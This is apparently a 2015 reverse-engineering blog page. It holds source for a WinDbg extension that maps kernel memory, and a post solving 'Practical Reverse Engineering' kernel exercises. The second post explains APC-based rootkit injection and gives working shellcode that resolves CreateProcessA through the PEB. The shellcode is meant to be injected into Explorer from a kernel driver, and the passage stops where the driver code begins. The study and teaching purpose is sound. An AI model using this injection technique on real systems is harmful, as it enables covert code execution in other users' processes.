Tuesday, February 17, 2015

A WinDbg extension to print the kernel memory layout

WinDbg is an awesome debugger, but I always missed the nice, compact and tidy view of the process memory layout that you have in OllyDbg (in View->Memory). Obviously WinDbg is capable of showing information about the virtual memory of a process (e.g. with !vad) or of the kernel (e.g. with !address), but I don't really like the output format of its commands. I wanted a fast-to-read output, thus I decided to experiment with WinDbg's interfaces to write my own extension capable of printing a convenient map of all the kernelmode virtual memory.

I chose to develop a DbgEng-style extension (see this documentation for more information about the extension styles, and how to write an extension in general) that basically provides one main command that does the job. I wrote it for 32bit Windows machines, but I am planning to extend it to 64bit platforms as well. I tested it on Windows XP 32bit with PAE enabled, and in theory it should work on other 32bit Windows versions (with or without PAE), but I have not had time to run further tests yet.

The strategy of the command is simple: it iterates over all the possible virtual addresses of 4k pages in the kernel space (that is, from 0x80000000 to 0xFFFFFFFF, for now I ignore the /3GB configuration option), it retrieves their corresponding PTEs and prints the attributes that they contain. Adjacent pages that have the same attributes are joined together and printed as a range. The output also includes some relevant symbols, e.g. it locates important regions identified by kernel variables like MmNonPagedPoolStart, MmNonPagedPoolEnd0 etc., and it associates the names of loaded drivers to the regions of memory to which they are mapped.
Here are some excerpts from the output:

 P = present  W = writable  X = executable  L = large
 U/K = user/kernel  T = transition  Y = prototype  S = swapped out/zero demand
 VA               Size     Attributes
-------------------------------------
 0000000080000000 --------             - nt!MmSystemRangeStart 
 0000000080004000 0000b000 P W X   K  
 0000000080010000 0000e000 P W X   K  
 0000000080039000 0000c000 P W X   K  
 000000008009f000 00062000 P W X   K  
 0000000080400000 00400000 P W X L K   - nt - hal
 0000000080a02000 00170000 P W X   K  
 0000000080fb1000 0000f000 P W X   K  
 0000000081000000 01600000 P W X L K   - nt!MmNonPagedPoolStart
 0000000082600000 --------             - nt!MmNonPagedPoolEnd0 
 0000000082600000 --------             - nt!MiExtraResourceStart 
 00000000b1f96000 00001000 P W X   K   - kmixer
 00000000b1f97000 00004000 P   X   K   - kmixer
 ...
 00000000f888a000 00001000 P W X   K   - Cdfs
 00000000f888b000 00001000 P   X   K   - Cdfs
 00000000f888c000 00001000 P W X   K   - Cdfs
 00000000f888d000 0000a000  T          - Cdfs
 00000000f8897000 00001000 P W X   K   - Cdfs
 00000000f88b9000 00001000  T         
 00000000f88c9000 00001000  T         
 00000000f88d7000 00003000 P W     K  
 ...

The VA and Size fields identify the memory range, then Attributes shows the properties of the pages it contains, and in the most right part of the output there are the symbols contained in such range. A VA with an invalid size (identified by "--------") means that the VA is not allocated, but there is a symbol associated to it nonetheless.

It is clear from the output that VA 80400000 is the beginning of a buffer, composed of two large pages (2Mb each), that contains the modules nt and hal. The NonPagedPool is also visible at VA 81000000 (11 large pages).
If we have a look at VA f888a000, we can see that this region of memory contains the module Cdfs.sys. Interestingly, the second page at VA f888b000 is read only (probably related to the .text section), while VA f888d000 is the starting of a set of pages that are not present and that are marked as transition PTEs (probably related to the .INIT or .PAGE section).
The following four files are the full source code of the extension.

file 1: exts.cpp
 #include "dbgexts.h"  
   
 char NameBuffer[1024];  
 char NameBufferPrevious[1024];  
   
 // symbol variables  
   
 bool MemSymbolsOk = false;  
 ULONG64 MemSymbols[][3] = {  
     // [api name] [symbol address] [symbol data]  
     (ULONG64)"nt!MmNonPagedPoolStart", 0, 0,  
     (ULONG64)"nt!MmNonPagedPoolEnd0", 0, 0,  
     (ULONG64)"nt!MmPagedPoolStart", 0, 0,  
     (ULONG64)"nt!MmPagedPoolEnd", 0, 0,  
     (ULONG64)"nt!MmNonPagedPoolExpansionStart", 0, 0,  
     (ULONG64)"nt!MmNonPagedPoolEnd", 0, 0,  
     (ULONG64)"nt!MmSystemRangeStart", 0, 0,  
     (ULONG64)"nt!MiExtraResourceStart", 0, 0,  
     (ULONG64)"nt!MiExtraResourceEnd", 0, 0,  
     (ULONG64)"nt!MiSystemViewStart", 0, 0,  
     (ULONG64)"nt!MiSessionPoolStart", 0, 0,  
     (ULONG64)"nt!MiSessionPoolEnd", 0, 0,  
     (ULONG64)"nt!MiSessionViewStart", 0, 0,  
     (ULONG64)"nt!MmSessionSpace", 0, 0,  
     (ULONG64)"nt!MiSessionImageStart", 0, 0,  
     (ULONG64)"nt!MiSessionImageEnd", 0, 0,  
     (ULONG64)"nt!MiSessionSpaceEnd", 0, 0,  
     (ULONG64)"nt!MmSystemPteBase", 0, 0,  
     (ULONG64)"nt!MmSystemPtesStart", 0, 0,  
     (ULONG64)"nt!MmSystemCacheStart", 0, 0,  
     (ULONG64)"nt!MmSystemCacheEnd", 0, 0,  
     (ULONG64)"nt!MmNonPagedSystemStart", 0, 0,  
     0, 0, 0  
 };  
   
 // passing ULONG64 as parameter is not going to work for some reason  
 // the only way is to pass 32bit numbers. %016llx does not work with printf like functions  
 char *Print64(ULONG32 HighPart, ULONG32 LowPart, char *String)  
 {  
     wsprintf(String, "%08x%08x", HighPart, LowPart);  
     return String;  
 }  
   
 // avoid 64bit parameters...  
 void PrintRange(ULONG32 BasePageAddress, char *BasePage, ULONG32 BaseSize, ULONG32 Attribs)  
 {  
     char AttribString[12];  
     UINT32 i;  
     HRESULT Result;  
   
     // string with attribs: PTWYXSL U/K   
   
     memset(AttribString, ' ', sizeof(AttribString));  
     if(Attribs & 1)  
     {  
         // page is valid, print hardware information  
         AttribString[0] = 'P';  
   
         if(Attribs & 2)    // RW  
         {  
             AttribString[2] = 'W';  
         }  
         if(!(Attribs & 0x80000000))    // NX  
         {  
             AttribString[4] = 'X';  
         }  
         if(Attribs & 0x80)  
         {  
             AttribString[6] = 'L';  
         }  
         if(Attribs & 4)        // User/Kernel  
         {  
             AttribString[8] = 'U';  
         }  
         else  
         {  
             AttribString[8] = 'K';  
         }  
     }  
     else  
     {  
         // Page is not valid, print additionally information aboout Prototype, Transition or Software pages  
         // taken from http://rekall-forensic.blogspot.ie/2014/10/windows-virtual-address-translation-and.html  
         // the windbg command "dt -r _MMPTE" shows all the PTE formats  
   
         if( !(Attribs & 0x400) && (Attribs & 0x800) )    // prototype = 0  transition = 1  
         {  
             // Transition PTE  
             AttribString[1] = 'T';  
         }  
         else if(Attribs & 0x400) // prototype = 1  
         {      
             // Prototype PTE  
             AttribString[3] = 'Y';  
         }  
         else if( !(Attribs & 0x400) && !(Attribs & 0x800) )    // prototype = 0  transition = 0  
         {  
             // Software PTE (paged out/zero demand)  
             AttribString[5] = 'S';  
         }  
   
     }  
     AttribString[10] = 0;  
     ExtPrintf(" %s %08x %s ", BasePage, BaseSize, AttribString);  
   
     // print the symbols associated to this VA range  
   
     i = 0;  
     if(MemSymbolsOk)  
     {  
         while(MemSymbols[i][0] != 0)  
         {  
             if((ULONG32)(MemSymbols[i][2]) >= BasePageAddress &&  
                 (ULONG32)(MemSymbols[i][2]) < BasePageAddress + BaseSize)  
             {  
                 ExtPrintf(" - %s", MemSymbols[i][0]);  
             }  
             i++;  
         }  
     }  
   
     // print the module names associated with this VA range  
     UINT32 j;  
     NameBufferPrevious[0] = 0;  
     for(i = BasePageAddress; i < BasePageAddress + BaseSize; i += 0x1000)  
     {  
         // try to locate the nearest symbol  
         Result = g_DebugSymbols->GetNearNameByOffset((ULONG64)(LONG)(i), 0, NameBuffer, 1024, NULL, NULL);  
         if(Result == S_OK || Result == S_FALSE)  
         {  
             NameBuffer[1023] = 0;  
             for(j = 0; j < 1024; j++)  
             {  
                 if(NameBuffer[j] == '!')  
                 {  
                     NameBuffer[j] = 0;  
                     break;  
                 }  
             }  
   
             if(j < 1024)  
             {  
                 // only print the name if it was not printed before  
                 if(strcmp(NameBufferPrevious, NameBuffer) != 0)  
                 {  
                     ExtPrintf(" - %s", NameBuffer);  
                     strcpy_s(NameBufferPrevious, 1024, NameBuffer);  
                     NameBufferPrevious[1023] = 0;  
                 }  
             }  
         }  
     }  
   
     ExtPrintf("\n");  
 }  
   
 #define PARAM64(__number, __numstring)    Print64((unsigned)__number >> 32, __number, __numstring)      
   
 HRESULT CALLBACK exthelp(PDEBUG_CLIENT4 Client, PCSTR args)  
 {  
     INIT_API();  
   
     ExtPrintf("\nUse print_symbol to load the symbols required by the extension \n");  
     ExtPrintf("Then use print_layout to print the whole memory layout of the kernelspace. \n");  
   
     EXIT_API();  
     return S_OK;  
 }  
   
 HRESULT CALLBACK print_layout(PDEBUG_CLIENT4 Client, PCSTR args)  
 {  
     INIT_API();  
   
     ULONG64 PteAddress, PteEntry, BasePage;  
     ULONG32 BaseAttributes, CurrentAttribs, BaseSize, i;  
     ULONG64 Tables[10];  
     ULONG Levels;  
     HRESULT Result;  
     char TempString1[20];  
   
     // flags 0-based  
     // RW bit 1, 0 = read only  
     // U/S bit 2, 0 = kernelmode, 1 = usermode  
     // PS bit 7, 0 = 4k, 1 = 4mb  
     // NX bit 63, 1 = no execute  
     // W X L U  
   
     ExtPrintf("\n");  
     ExtPrintf(" P = present W = writable X = executable L = large\n");  
     ExtPrintf(" U/K = user/kernel T = transition Y = prototype S = swapped out/zero demand\n");  
     ExtPrintf(" VA        Size   Attributes\n");  
     ExtPrintf("-------------------------------------\n");  
     BasePage = 0xFFFFFFFFFFFFFFFF;  
     BaseAttributes = 0xFFFFFFFF;  
     BaseSize = 0;  
   
     for(ULONG64 VAddress = 0x80000000; VAddress < 0xFFFFF000; VAddress += 0x1000)  
     {  
         Result = g_DataSpaces2->GetVirtualTranslationPhysicalOffsets(VAddress, Tables, 10, &Levels);  
         if(Result != S_OK)  
         {  
             // if there was a previous buffer, print it out  
             if(BasePage != 0xFFFFFFFFFFFFFFFF)  
             {  
                 PrintRange((ULONG32)BasePage, PARAM64(BasePage, TempString1), BaseSize, BaseAttributes);  
             }  
   
             // if the symbol refers to a non allocated page, print it here  
             i = 0;  
             while(MemSymbols[i][0] != 0 && MemSymbolsOk)  
             {  
                 if((ULONG32)(MemSymbols[i][2]) >= (ULONG32)VAddress &&  
                     (ULONG32)(MemSymbols[i][2]) < (ULONG32)VAddress + 0x1000)  
                 {  
                     ExtPrintf(" %s --------       - %s \n", PARAM64(VAddress, TempString1), MemSymbols[i][0]);  
                 }  
                 i++;  
             }  
   
             BasePage = 0xFFFFFFFFFFFFFFFF;  
             BaseAttributes = 0xFFFFFFFF;  
             BaseSize = 0;  
             continue;  
         }  
   
         PteAddress = Tables[Levels - 2];  
         Result = g_DataSpaces->ReadPhysical(PteAddress, &PteEntry, 8, NULL);  
   
         if(BasePage == 0xFFFFFFFFFFFFFFFF)  
         {  
             // case first page of buffer  
             BasePage = VAddress;  
             BaseAttributes = (PteEntry & 0x7FFFFFFF);  
             if(PteEntry & 0x8000000000000000)    // NX bit  
             {  
                 BaseAttributes |= 0x80000000;  
             }  
             BaseSize = 0x1000;  
         }  
         else  
         {  
             CurrentAttribs = (PteEntry & 0x7FFFFFFF);  
             if(PteEntry & 0x8000000000000000)  
             {  
                 CurrentAttribs |= 0x80000000;  
             }  
   
             bool new_buf = true;  
             if((BaseAttributes & 1) && (CurrentAttribs & 1))  
             {  
                 // if P bit is set in both  
                 if( (BaseAttributes & 0x80000087) == (CurrentAttribs & 0x80000087) )  
                 {  
                     // and other interesting bits are equal in both, the buffer is continuing  
                     new_buf = false;  
                 }  
             }  
             else if(!(BaseAttributes & 1) && !(CurrentAttribs & 1))  
             {  
                 // if P bit is not set in both  
                 if( (BaseAttributes & 0x00000C00) == (CurrentAttribs & 0x00000C00) )  
                 {  
                     // and other interesting bits are equal in both, the buffer is continuing  
                     new_buf = false;  
                 }  
             }  
             // if P is different in both, break is obviously necessary  
   
             if(new_buf)  
             {  
                 // if the protection is different:  
                 // print the buffer and continue  
                 PrintRange((ULONG32)BasePage, PARAM64(BasePage, TempString1), BaseSize, BaseAttributes);  
   
                 // break to a new buffer  
                 BasePage = VAddress;  
                 BaseAttributes = (PteEntry & 0x7FFFFFFF);  
                 if(PteEntry & 0x8000000000000000)  
                 {  
                     BaseAttributes |= 0x80000000;  
                 }  
   
                 BaseSize = 0;  
             }  
   
             // case following pages  
             BaseSize += 0x1000;  
         }  
     }  
   
     EXIT_API();  
     return S_OK;  
 }  
   
 HRESULT CALLBACK print_symbol(PDEBUG_CLIENT4 Client, PCSTR args)  
 {  
     INIT_API();  
   
     char TempString1[20];  
     char TempString2[20];  
     UINT32 i;  
     HRESULT Result;  
   
     i = 0;  
     while(MemSymbols[i][0] != 0)  
     {  
         Result = g_DebugSymbols->GetOffsetByName((char*)(MemSymbols[i][0]), &(MemSymbols[i][1]));  
         if(Result != S_OK)  
         {  
             ExtPrintf("Error retrieving symbol %s \n", (char*)MemSymbols[i][0]);  
             return Result;  
         }  
   
         Result = g_DataSpaces->ReadVirtual(MemSymbols[i][1], &(MemSymbols[i][2]), 8, NULL);  
         if(Result != S_OK)  
         {  
             ExtPrintf("Error reading symbol data for %s \n", (char*)MemSymbols[i][0]);  
             return Result;  
         }  
   
         ExtPrintf("Symbol retrieved %s, offset: %s data: %s \n", (char*)(MemSymbols[i][0]), PARAM64(MemSymbols[i][1], TempString1), PARAM64(MemSymbols[i][2], TempString2));  
   
         i++;  
     }  
   
     MemSymbolsOk = true;  
   
     EXIT_API();  
     return S_OK;  
 }  
   

file 2: dbgexts.h
 #include <windows.h>  
 #include <stdio.h>  
 #include <stdlib.h>  
 #include <string.h>  
   
 #define KDEXT_64BIT  
 #include <wdbgexts.h>  
 #include <dbgeng.h>  
   
 #pragma warning(disable:4201) // nonstandard extension used : nameless struct  
 #include <extsfns.h>  
   
 #ifdef __cplusplus  
 extern "C" {  
 #endif  
   
   
 #define INIT_API()               \  
   HRESULT Status;              \  
   if ((Status = ExtQuery(Client)) != S_OK) return Status;  
   
 #define EXT_RELEASE(Unk) \  
   ((Unk) != NULL ? ((Unk)->Release(), (Unk) = NULL) : NULL)  
   
 #define EXIT_API   ExtRelease  
   
 // Global variables initialized by query.  
 extern PDEBUG_DATA_SPACES2  g_DataSpaces2;  
 extern PDEBUG_DATA_SPACES  g_DataSpaces;  
 extern PDEBUG_SYMBOLS    g_DebugSymbols;  
   
 HRESULT ExtQuery(PDEBUG_CLIENT4 Client);  
 void ExtRelease(void);  
 HRESULT NotifyOnTargetAccessible(PDEBUG_CONTROL Control);  
 void __cdecl ExtPrintf(PCSTR Format, ...);  
   
 #ifdef __cplusplus  
 }  
 #endif  
   

file 3: dbgexts.cpp
 #include "dbgexts.h"  
   
 PDEBUG_CLIENT4    g_ExtClient;  
 PDEBUG_CONTROL    g_ExtControl;  
 PDEBUG_DATA_SPACES2  g_DataSpaces2;  
 PDEBUG_DATA_SPACES  g_DataSpaces;  
 PDEBUG_SYMBOLS    g_DebugSymbols;  
 PDEBUG_SYMBOLS2    g_ExtSymbols;  
   
 extern "C" HRESULT ExtQuery(PDEBUG_CLIENT4 Client)  
 {  
   HRESULT Status;  
   
   if ((Status = Client->QueryInterface(__uuidof(IDebugControl), (void **)&g_ExtControl)) != S_OK)  
   {  
     goto Fail;  
   }  
   if ((Status = Client->QueryInterface(__uuidof(IDebugSymbols2), (void **)&g_ExtSymbols)) != S_OK)  
   {  
         goto Fail;  
   }  
   if ((Status = Client->QueryInterface(__uuidof(IDebugDataSpaces2), (void **)&g_DataSpaces2)) != S_OK)  
   {  
         goto Fail;  
   }  
   if ((Status = Client->QueryInterface(__uuidof(IDebugDataSpaces), (void **)&g_DataSpaces)) != S_OK)  
   {  
         goto Fail;  
   }  
   if ((Status = Client->QueryInterface(__uuidof(IDebugSymbols), (void **)&g_DebugSymbols)) != S_OK)  
   {  
         goto Fail;  
   }  
   
   g_ExtClient = Client;  
   
   return S_OK;  
   
 Fail:  
   ExtRelease();  
   return Status;  
 }  
   
 void ExtRelease(void)  
 {  
   g_ExtClient = NULL;  
   EXT_RELEASE(g_ExtControl);  
   EXT_RELEASE(g_ExtSymbols);  
 }  
   
 void __cdecl ExtPrintf(PCSTR Format, ...)  
 {  
   va_list Args;  
   
   va_start(Args, Format);  
   g_ExtControl->OutputVaList(DEBUG_OUTCTL_ALL_CLIENTS, Format, Args);  
   va_end(Args);  
 }  
   
 extern "C" HRESULT CALLBACK DebugExtensionInitialize(PULONG Version, PULONG Flags)  
 {  
   *Version = DEBUG_EXTENSION_VERSION(1, 0);  
   *Flags = 0;  
   return S_OK;  
 }  
   
 extern "C" void CALLBACK DebugExtensionNotify(ULONG Notify, ULONG64 Argument)  
 {  
   return;  
 }  
   
 extern "C" void CALLBACK DebugExtensionUninitialize(void)  
 {  
   return;  
 }  
   
 extern "C" HRESULT CALLBACK KnownStructOutput(ULONG Flag, ULONG64 Address, PSTR StructName, PSTR Buffer, PULONG BufferSize)  
 {  
   return S_OK;  
 }  
     

file 4: dbgexts.def
 
 ;--------------------------------------------------------------------  
 ;  Copyright (c) 2000 Microsoft Corporation  
 ;  
 ;Module:  
 ;  dbgexts.def  
 ;--------------------------------------------------------------------  
   
 EXPORTS  
   
 ;--------------------------------------------------------------------  
 ; These are the extensions exported by dll  
 ;--------------------------------------------------------------------  
   
      exthelp  
      print_layout  
      print_symbol  
   
 ;--------------------------------------------------------------------  
 ;  
 ; these are the extension service functions provided for the debugger  
 ;  
 ;--------------------------------------------------------------------  
   
      DebugExtensionNotify  
      DebugExtensionInitialize  
      DebugExtensionUninitialize  
      KnownStructOutput  
   

I took some macros from one of the source code templates that is available in the WinDbg SDK. I had problems when passing 64bit integers as function parameters (the extension was compiled for 32bit), therefore I used a quick and ugly macro (PARAM64) to solve the problem.

The core of the functionality is inside the print_layout function/command in exts.cpp:

...
for(ULONG64 VAddress = 0x80000000; VAddress < 0xFFFFF000; VAddress += 0x1000)
{
Result = g_DataSpaces2->GetVirtualTranslationPhysicalOffsets(VAddress, Tables, 10, &Levels);
...
PteAddress = Tables[Levels - 2];
Result = g_DataSpaces->ReadPhysical(PteAddress, &PteEntry, 8, NULL);
...

This is the main loop that iterates over every possible page, performing a virtual-to-physical translation by using GetVirtualTranslationPhysicalOffsets. This function is very interesting because it returns all the entries from all the steps used to perform the translation: the physical address of the PDPT, PDE, PTE and of the page itself (the translations steps change according to the features supported by the CPU). Then, the code uses ReadPhysical to read the data contained in the PTE and extracts all the attributes from it. The rest of the function simply recognizes ranges of pages that share the same attributes and, for every one being identified, PrintRange is invoked.

As the name suggests, PrintRange is in charge of displaying the gathered information for every range, and takes as its arguments a range's virtual address, size and attributes. In addition, it is also responsible for determining if one of the supported symbols (that are stored in the array MemSymbols) is contained within the range and if a driver module is associated to the range by using GetNearNameByOffset. In case it does, it prints them too. Of course, these two last capabilities only work if the debug symbols are loaded in WinDbg.

Note that the array of the supported symbols contains the names of internal kernel variables that identify interesting areas of memory (e.g. the paged pool, the non paged pool, etc.), and two empty entries that will be filled at run-time with the virtual address of the symbol and the data it points to. This functionality is implemented in the print_symbol function/command: you should call it before print_layout in order to displays the supported symbols.

The source files dbgext.cpp and dbgexts.h contain macros and initialization code that are required by the extension, while dbgexts.def contains the definitions of the exported functions (that will become the actual commands to be invoked from WinDbg commandline).

To compile the extension, you need to add WinDbg's include and library paths, normally located in:

 C:\Program Files\Debugging Tools for Windows (x64)\sdk\inc
 C:\Program Files\Debugging Tools for Windows (x64)\sdk\lib\i386

Make sure that you add the .def file via project->properties->linker->input->module definition file (this works on Visual Studio 2010).
Once the extension is compiled, place it in WinDbg's extension folder:

 C:\Program Files (x86)\Debugging Tools for Windows (x86)\winext

and load it from WinDbg with:

.load <extensionfilename>

Also make sure you have Windows debug symbols installed and loaded. At this point, using !print_symbol initializes the supported symbols, and !print_layout produces the final output.

This is a POC, it was a good exercise to make practice with WinDbg extensions, I am planning to rework this source code to make it compatible with all versions of Windows on 32 and 64 bit. At the moment it is not very fast, it takes few minutes to print the whole layout, but I think it is possible to speed up the processing avoiding the brute force loop on every page, and handling in a smarter way the pages based on the contents of the PDEs and PTEs (basically if a PDE is invalid I can exclude a lot of memory addresses from the loop).

Monday, February 9, 2015

Solution to some of "The Windows kernel" exercises from Practical Reverse Engineering (part 2)

Here is the second part of the solutions to the "Windows Kernel" exercises from the "Practical Reverse Engineering" book. Specifically, this post is about the first eight that you will find in the "Investigating and Extending your Knowledge" section.
It should be noted that the code proposed in my solutions is to be intended as working POCs and that the methodologies can be generalized/improved so that they would work independently of the Windows version etc. Finally, the ideas I used to solve the exercises are based on known mechanisms (e.g. the KeUserModeCallback method).

1)
NX is a bit set in the page tables that specifies whether a memory page can run executable code or not. If the CPU tries to execute code from a page that is not marked as executable, an exception is raised. Windows (and other OSes too) leverages this bit in order to mark heap and stack data areas as not executable. In this way, should a buffer overflow happen, an attacker will not be able to exploit it in order to jump to a shellcode on the heap or stack. This bit is supported on x64 architecture, and on x86 with PAE enabled.
Prior to the introduction of this bit, there were some software implementations that tried to provide non-executable data by using hardware segmentation (e.g. W^X and ExecShield). The x86 hardware, in fact, provides segmentation in order to define code and data segments, each with its own properties (read, write or execute). Normally, Windows (32bit) creates usermode code and data segments (CS and DS) that are as big as the whole 32bit addressable range: this means that according to the code segment properties, every possible 32bit address is executable (the division between usermode and kernelmode is done via the page tables). This leaves the opportunity for an exploit to write shellcodes in data areas and execute them. To sort out this problem without the NX bit, it is possible to make a code segment smaller, in order to leave out a range of addresses that are not part of it. Then a data segment can be created using this range of memory that is not part of the code segment. At this point, the code segment can be marked as executable, and the data segment can be marked as read/write only, ensuring that if the execution ends up in the range of addresses reserved for the data, an exception is raised.
Another potential way to emulate the NX bit would be to modify the page tables for the heap and stack in order to make them invalid: every access to a page would trigger a page fault, that would be trapped by the page fault handler. The OS would have to check the kind of fault, and determine if it is a memory read, write or execute. If it is execute, then there is something wrong and the process will be terminated. In theory, this would work, but in practice it would add a very big overhead on the run time (every memory access would cause an exception!), thus it may not be feasible (the PaX Linux kernel patch uses a similar approach).

2) 
The APIs that provide the functionality to manage APCs are KeInitializeApc and KeInsertQueueApc. Since they are not declared in the DDK headers it is necessary to assign their addresses to appropriate function pointers via MmGetSystemRoutineAddress in order to use them.
  • KeInitializeApc simply initializes a KAPC structure by storing into it all the necessary information about the APC that is going to be queued for execution, including the KTHREAD to which the APC must be queued to and the addresses of the callbacks to run.
  • KeInsertQueueApc, instead, does the actual work of scheduling the APC for execution in the given KAPC.Thread (of type KTHREAD). To do so, it begins by acquiring the spinlock stored in KTHREAD.ApcQueueLock, necessary for proper synchronization. Then, if KTHREAD.ApcQueueable is set to 1, the API invokes the internal function KiInsertQueueApc, which in turn verifies that KAPC.Inserted is set to 0 and, if it is, adds the APC to some memory referenced by the KTHREAD.ApcStatePointer array. In particular, this array contains two pointers to KAPC_STATE structures, where the APC queues (implemented by using LIST_ENTRYs) are actually stored.
    Why two? The first KAPC_STATE structure is related to the APCs whose KAPC.ApcStateIndex is OriginalApcEnvrionment, while the second is related to the ones whose KAPC.ApcStateIndex is AttachedApcEnvironment. Basically, the value of KAPC.ApcStateIndex differentiates between the APCs that are running in the context of the process to which the thread belongs and the ones that are running in a thread that is attached to a different process. This is why two structures are kept.
    Once the correct one is determined, a further discrimination is to be made
    . Each structure contains an array of two LIST_ENTRY structures (named KAPC_STATE.ApcListHead), that are selected according to the value stored in KAPC.ApcMode, which is either 0 (KernelMode) or 1 (UserMode)These are the actual APCs queues.
    Once the APC is queued, the member KAPC.Inserted is set to 1, and then, if the APC is kernelmode, KTHREAD.KAPC_STATE.KernelApcPending is also set to 1. Furthermore, HalRequestSoftwareInterrupt may be invoked to switch to APC_LEVEL.
  • The queues of APCs will eventually be walked by the KiDeliverApc API, which will call the various kernel, normal and rundown routines for each APC.
APCs offer the possibility to execute code inside a specific process' context and there are various possible use cases for them. Windows uses APCs to perform thread suspension, to schedule some completion routines, to set and get a thread's context, and more.
Usermode APCs provide a handy way to execute code in usermode from kernelmode, commonly done by rootkits since it allows the possibility to inject malicious payloads in running processes, hook their APIs etc. Examples are presented in the answer to exercise 3.

3)
Since there is no directly available API to create a process from kernel mode, I decided to leverage APCs to run malicious usermode code in a particular process. I devised three different ways to achieve this goal and, although all of them rely on APCs, their approach changes considerably.
The general strategy involves some preliminary operations to locate the target process, obtain its handle and allocate some memory in its process address space. The malicious code is then copied in this memory area (injection) and an APC is initialized in either one of these ways:
  1. Usermode APC with the normal routine set to the allocated area, that contains the malicious code.
  2. Kernelmode APC with the kernel routine set to hook a user-mode API. In this case, the allocated area contains the assembly code of the hook, that will be executed only once, in the context of the target process.
  3. Kernelmode APC with the kernel routine set to overwrite an empty entry in the kernel-to-usermode callback table with the address of the allocated area, and let KeUserModeCallback call it. The allocated area contains the malicious code.
There are of course many other methods to start a process from kernelmode code. For example, a possible variant of the second method, that doesn't involve APCs, would consist in using SetCreateProcessNotifyRoutine in order to inject the malicious code in every process that is created and then hooking a common API to redirect its code towards the malicious code. However, here I chose to focus solely on the three above mentioned ideas.

Method 1
For the first method, I used the APCs in the most natural way: I queued a usermode APC to Explorer that simply runs a "shellcode", which in turn locates and calls the CreateProcess API to execute Notepad.

First of all, I needed to have the usermode shellcode, thus I wrote the following usermode application:
 #include <stdio.h>  
 #include <intrin.h>  
 #include <windows.h>  
   
 typedef BOOL (*PCREATEPROCESS)(LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes,  
  LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment,  
  LPCTSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);  
     
 void main(void)  
 {  
      unsigned __int64 ptrPEB;  
      unsigned __int64 ptrPEB_LDR_DATA;  
      unsigned __int64 ptrInLoadOrderModuleList;  
      unsigned __int64 DllBase;  
      unsigned int *pNames, *pAddresses;  
      PCREATEPROCESS pCreateProcess;  
      wchar_t *DllPath;  
      char app_notepad[12];  
      STARTUPINFO si;  
      PROCESS_INFORMATION pi;  
   
      app_notepad[0] = 'n';  
      app_notepad[1] = 'o';  
      app_notepad[2] = 't';  
      app_notepad[3] = 'e';  
      app_notepad[4] = 'p';  
      app_notepad[5] = 'a';  
      app_notepad[6] = 'd';  
      app_notepad[7] = '.';  
      app_notepad[8] = 'e';  
      app_notepad[9] = 'x';  
      app_notepad[10] = 'e';  
      app_notepad[11] = 0;  
   
      //memset(&si, 0, sizeof(si));  
      for(int j = 0; j < sizeof(si); j++)  
      {  
           ((char *)&si)[j] = 0;  
      }  
      si.cb = sizeof(si);  
      //memset(&pi, 0, sizeof(pi));  
      for(int j = 0; j < sizeof(pi); j++)  
      {  
           ((char *)&pi)[j] = 0;  
      }  
   
      IMAGE_DOS_HEADER *pMZ;   
      IMAGE_NT_HEADERS *pPE;   
      IMAGE_EXPORT_DIRECTORY *pExpDir;   
      CHAR *currentName;  
   
      ptrPEB = __readgsqword(0x60);  
      ptrPEB_LDR_DATA = *(unsigned __int64 *)(ptrPEB + 0x18);  
      ptrInLoadOrderModuleList = *((unsigned __int64 *)(ptrPEB_LDR_DATA + 0x10));  
   
      DllPath = (wchar_t*) *(unsigned __int64 *)(ptrInLoadOrderModuleList + 0x50);  
      DllPath += 0x14;     // skip "C:\windows\system32\"  
   
      while(true)  
      {  
           // 6b 00 65 00 72 00 6e 00 - 65 00 6c 00 33 00 32 00 - 2e 00 64 00 6c 00 6c 00  
   
           if( ((unsigned __int64 *)DllPath)[0] == 0x006e00720065006b &&  
                ((unsigned __int64 *)DllPath)[1] == 0x00320033006c0065 &&  
                ((unsigned __int64 *)DllPath)[2] == 0x006c006c0064002e )  
           {  
                break;  
           }  
   
           ptrInLoadOrderModuleList = *((unsigned __int64 *)ptrInLoadOrderModuleList);  
           DllPath = (wchar_t*) *(unsigned __int64 *)(ptrInLoadOrderModuleList + 0x50);  
           DllPath += 0x14;     // skip "C:\windows\system32\"  
      }  
   
      DllBase = *(unsigned __int64 *)(ptrInLoadOrderModuleList + 0x30);  
   
      pMZ = (IMAGE_DOS_HEADER*)DllBase;   
      pPE = (IMAGE_NT_HEADERS*)(DllBase + pMZ->e_lfanew);   
      pExpDir = (IMAGE_EXPORT_DIRECTORY*)(DllBase + pPE->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);   
     
      pNames = (unsigned int *)(DllBase + pExpDir->AddressOfNames);   
      pAddresses = (unsigned int *)(DllBase + pExpDir->AddressOfFunctions);   
      for(unsigned int i = 0; i < pExpDir->NumberOfNames; i++)   
      {   
           currentName = (CHAR*)(DllBase + pNames[i]);   
   
           //43 72 - 65 61 - 74 65 - 50 72 - 6f 63 - 65 73 - 73 41  
   
           if( ((unsigned __int64 *) currentName)[0] == 0x7250657461657243 &&  
                ((unsigned __int32 *) currentName)[2] == 0x7365636f &&  
                ((unsigned short *) currentName)[6] == 0x4173 )  
           {  
                pCreateProcess = (PCREATEPROCESS)(DllBase + pAddresses[i]);  
                break;  
           }  
      }   
   
      pCreateProcess(NULL, (LPTSTR)app_notepad, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);  
 }  

This code purposely avoids the use of any API or CRT function in order to be relocatable. As a result, after compiling it, I was able to simply copy all the opcodes generated for the "main" function and use them as an executable buffer that gets injected into a running process.
The shellcode behaves similarly to the ones you can find in the exploits: it accesses the PEB to get the PEB_LDR_DATA and its InLoadOrderModuleList field, which is a pointer to a list of LDR_DATA_TABLE_ENTRY structures, each representing a loaded module. The code walks the list to locate kernel32.dll (the DLL name is kept in LDR_DATA_TABLE_ENTRY.FullDllName) and, once found, it retrieves its imagebase via LDR_DATA_TABLE_ENTRY.DllBase. It is then straightforward to parse the PE header of the dll in order to locate its export table, and the address of the CreateProcessA API from it. The shellcode concludes by calling such API to launch Notepad.

Having the shellcode sorted out, let's see the code for the kernelmode driver (note that the shellcode is encoded in the "buffer[]" array):
 #include <Ntifs.h>  
 #include <string.h>  
   
 char buffer[] = {  
